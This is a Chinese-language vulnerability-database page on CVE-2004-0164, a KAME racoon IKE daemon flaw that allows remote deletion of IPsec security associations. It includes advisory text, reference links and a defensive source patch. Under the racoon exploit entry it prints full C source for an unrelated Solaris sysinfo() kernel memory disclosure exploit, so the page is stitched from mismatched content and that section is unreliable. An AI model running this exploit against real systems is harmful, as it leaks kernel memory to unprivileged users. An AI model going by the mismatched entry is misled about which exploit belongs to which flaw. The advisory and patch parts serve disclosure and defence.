CVE-2004-0164
CVSS5.0
发布时间 :2004-03-03 00:00:00
修订时间 :2016-10-17 22:41:22
NMCOES    

[原文]KAME IKE daemon (racoon) does not properly handle hash values, which allows remote attackers to delete certificates via (1) a certain delete message that is not properly handled in isakmp.c or isakmp_inf.c, or (2) a certain INITIAL-CONTACT message that is not properly handled in isakmp_inf.c.


[CNNVD]KAME Racoon 畸形消息删除SA漏洞(CNNVD-200403-048)

        
        racoon是KAME的IKE守护程序。
        racoon存在安全问题,远程攻击者可以利用这个漏洞未授权删除IPsec的SAs。
        当racoon接收到包含没有设置ISAKMP安全关联(SAs)的main/aggressive/base模式初始cookie的删除消息,会使攻击者未授权删除所有Ipsec(和ISAKMP)SAs。
        同样的使用INITIAL-CONTACT请求消息可不需要Hash负载以删除所有IPsec SAs相关的目的地址。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:9737KAME IKE daemon (racoon) does not properly handle hash values, which allows remote attackers to delete certificates via (1) a certain delete...
oval:org.mitre.oval:def:947KAME IKE Daemon Improper Hash Value Handling
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0164
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0164
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200403-048
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2004-001.txt.asc
(UNKNOWN)  NETBSD  NetBSD-SA2004-001
http://lists.apple.com/archives/security-announce/2004/Feb/msg00000.html
(UNKNOWN)  APPLE  APPLE-SA-2004-02-23
http://marc.info/?l=bugtraq&m=107403331309838&w=2
(UNKNOWN)  BUGTRAQ  20040113 unauthorized deletion of IPsec (and ISAKMP) SAs in racoon
http://marc.info/?l=bugtraq&m=107411758202662&w=2
(UNKNOWN)  BUGTRAQ  20040114 Re: unauthorized deletion of IPsec (and ISAKMP) SAs in racoon
http://www.securityfocus.com/bid/9416
(UNKNOWN)  BID  9416
http://www.securityfocus.com/bid/9417
(UNKNOWN)  BID  9417
http://xforce.iss.net/xforce/xfdb/14117
(VENDOR_ADVISORY)  XF  openbsd-isakmp-invalidspi-delete-sa(14117)
http://xforce.iss.net/xforce/xfdb/14118
(UNKNOWN)  XF  openbsd-isakmp-initialcontact-delete-sa(14118)

- 漏洞信息

KAME Racoon 畸形消息删除SA漏洞
中危 访问验证错误
2004-03-03 00:00:00 2005-10-20 00:00:00
远程  
        
        racoon是KAME的IKE守护程序。
        racoon存在安全问题,远程攻击者可以利用这个漏洞未授权删除IPsec的SAs。
        当racoon接收到包含没有设置ISAKMP安全关联(SAs)的main/aggressive/base模式初始cookie的删除消息,会使攻击者未授权删除所有Ipsec(和ISAKMP)SAs。
        同样的使用INITIAL-CONTACT请求消息可不需要Hash负载以删除所有IPsec SAs相关的目的地址。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * IIJ SEIL team提供如下补丁方案:
        Index: isakmp_inf.c
        ===================================================================
        RCS file: /cvsroot/kame/kame/kame/kame/racoon/isakmp_inf.c,v
        retrieving revision 1.82
        diff -u -r1.82 isakmp_inf.c
        --- isakmp_inf.c 13 Nov 2003 02:30:20 -0000 1.82
        +++ isakmp_inf.c 14 Jan 2004 09:14:31 -0000
        @@ -136,10 +136,81 @@
        
         isakmp = (struct isakmp *)msg->v;
         gen = (struct isakmp_gen *)((caddr_t)isakmp + sizeof(struct isakmp));
        - if (isakmp->np == ISAKMP_NPTYPE_HASH)
        - np = gen->np;
        - else
        - np = isakmp->np;
        +
        + if (isakmp->np != ISAKMP_NPTYPE_HASH) {
        + plog(LLV_ERROR, LOCATION, NULL,
        + "ignore information because the message has no hash payload.\n");
        + goto end;
        + }
        +
        + if (iph1->status != PHASE1ST_ESTABLISHED) {
        + plog(LLV_ERROR, LOCATION, NULL,
        + "ignore information because ISAKMP-SA has not been established yet.\n");
        + goto end;
        + }
        +
        + np = gen->np;
        +
        + {
        + void *p;
        + vchar_t *hash, *payload;
        + struct isakmp_gen *nd;
        +
        + /*
        + * XXX: gen->len includes isakmp header length
        + */
        + p = (caddr_t) gen + sizeof(struct isakmp_gen);
        + nd = (struct isakmp_gen *) ((caddr_t) gen + gen->len);
        +
        + /* nd length check */
        + if (nd->len > msg->l - (sizeof(struct isakmp) + gen->len)) {
        + plog(LLV_ERROR, LOCATION, NULL,
        + "too long payload length (broken message?)\n");
        + goto end;
        + }
        +
        + payload = vmalloc(nd->len);
        + if (payload == NULL) {
        + plog(LLV_ERROR, LOCATION, NULL,
        + "cannot allocate memory\n");
        + goto end;
        + }
        +
        + memcpy(payload->v, (caddr_t) nd, nd->len);
        +
        + /* compute HASH */
        + hash = oakley_compute_hash1(iph1, isakmp->msgid, payload);
        + if (hash == NULL) {
        + plog(LLV_ERROR, LOCATION, NULL,
        + "cannot compute hash\n");
        +
        + vfree(payload);
        + goto end;
        + }
        +
        + if (gen->len - sizeof(struct isakmp_gen) != hash->l) {
        + plog(LLV_ERROR, LOCATION, NULL,
        + "ignore information due to hash length mismatch\n");
        +
        + vfree(hash);
        + vfree(payload);
        + goto end;
        + }
        +
        + if (memcmp(p, hash->v, hash->l) != 0) {
        + plog(LLV_ERROR, LOCATION, NULL,
        + "ignore information due to hash mismatch\n");
        +
        + vfree(hash);
        + vfree(payload);
        + goto end;
        + }
        +
        + plog(LLV_DEBUG, LOCATION, NULL, "hash validated.\n");
        +
        + vfree(hash);
        + vfree(payload);
        + }
        
         /* make sure the packet were encrypted. */
         if (!encrypted) {
        厂商补丁:
        Thomas Walpuski
        ---------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        
        http://packages.debian.org/unstable/net/racoon.html

- 漏洞信息 (23540)

KAME Racoon "Initial Contact" SA Deletion Vulnerability (EDBID:23540)
freebsd dos
2004-01-14 Verified
0 Thomas Walpuski
N/A [点击下载]
source: http://www.securityfocus.com/bid/9417/info

It has been reported that it may be possible for attackers to remotely delete security associations (SAs) in hosts running the KAME IKE daemon Racoon.

/* Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure exploit
 * ===================================================================
 * Local exploitation of an integer overflow vulnerability in Sun
 * Microsystems Inc. Solaris allows attackers to read kernel memory from a
 * non-privileged userspace process. The vulnerability specifically exists
 * due to an integer overflow in /usr/src/uts/common/syscall/systeminfo.c
 *
 * Example Use.
 * $ uname -a 
 * SunOS sunos 5.11 snv_30 sun4u sparc SUNW,Ultra-250
 * $ ./prdelka-vs-SUN-sysinfo kbuf
 * [ Solaris <= 10 sysinfo() kernel memory information leak
 * [ Wrote 1294967293 bytes to kbuf
 * $ ls -al kbuf
 * -rwx------   1 user     other       1.2G Jul 21 23:56 kbuf
 *
 * -prdelka
 */
#include <sys/systeminfo.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define bufsize 1294967293

int main(int argc,char* argv[]){
        int fd;
 	ssize_t out;
        char* output_buffer;
	if(argc < 2){
		printf("[ Use with <filepath>\n");
		exit(1);
	}
        printf("[ Solaris <= 10 sysinfo() kernel memory information leak\n");
	output_buffer = malloc(bufsize);
        memset(output_buffer,0,bufsize);
        sysinfo(SI_SYSNAME,output_buffer,0);
        fd = open(argv[1],O_RDWR|O_CREAT,0700);
	if(fd!=-1){
	        out = write(fd,output_buffer,bufsize);
		printf("[ Wrote %u bytes to %s\n",out,argv[1]);
	        close(fd);
	}
        exit(0);
}
		

- 漏洞信息

3495
KAME Racoon Arbitrary Security Association Deletion

- 漏洞描述

Racoon contains a flaw that may allow a malicious user to cause a Denial of Service. The issue is triggered when when Racoon receives a delete message containing the initiator cookie of a main/aggressive/base mode that has not yet setup an ISAKMP security association. It is possible that the flaw may allow a DoS resulting in a loss of availability.

- 时间线

2004-01-13 2003-08-01
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, KAME has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

KAME Racoon "Initial Contact" SA Deletion Vulnerability
Access Validation Error 9417
Yes No
2004-01-14 12:00:00 2009-07-12 02:06:00
Discovered by Thomas Walpuski <thomas@thinknerd.de>.

- 受影响的程序版本

SGI ProPack 3.0
SCO Unixware 7.1.4
KAME Racoon
+ FreeBSD FreeBSD 4.9
+ NetBSD NetBSD 1.6.1
+ NetBSD NetBSD 1.6

- 漏洞讨论

It has been reported that it may be possible for attackers to remotely delete security associations (SAs) in hosts running the KAME IKE daemon Racoon.

- 漏洞利用

Though no exploit code is available, a detailed description of an attack that exploits this vulnerability is included in the message by Thomas Walpuski &lt;thomas@thinknerd.de&gt;. See the reference section.

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com &lt;mailto:vuldb@securityfocus.com&gt;.

- 解决方案

SGI has released an advisory (20040506-01-U) with Patch 10075 for SGI ProPack 3 to address this and other issues. Please see the referenced advisory for more information.

NetBSD has released an advisory that includes updates. Fix details may be found in the attached advisory.

Red Hat has released advisory RHSA-2004:165-09 dealing with this and other issues for their enterprise linux distribution. Customers subscribed to the Red Hat Network may apply the appropriate fixes using the Red Hat Update Agent (up2date). Please see referenced advisory for additional information.

The vendor has released a patch to address this issue.

SCO has released advisory SCOSA-2005.10 to address various issues in Racoon affecting UnixWare 7.1.4. Please see the referenced advisory for more information.


KAME Racoon

SGI ProPack 3.0

SCO Unixware 7.1.4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站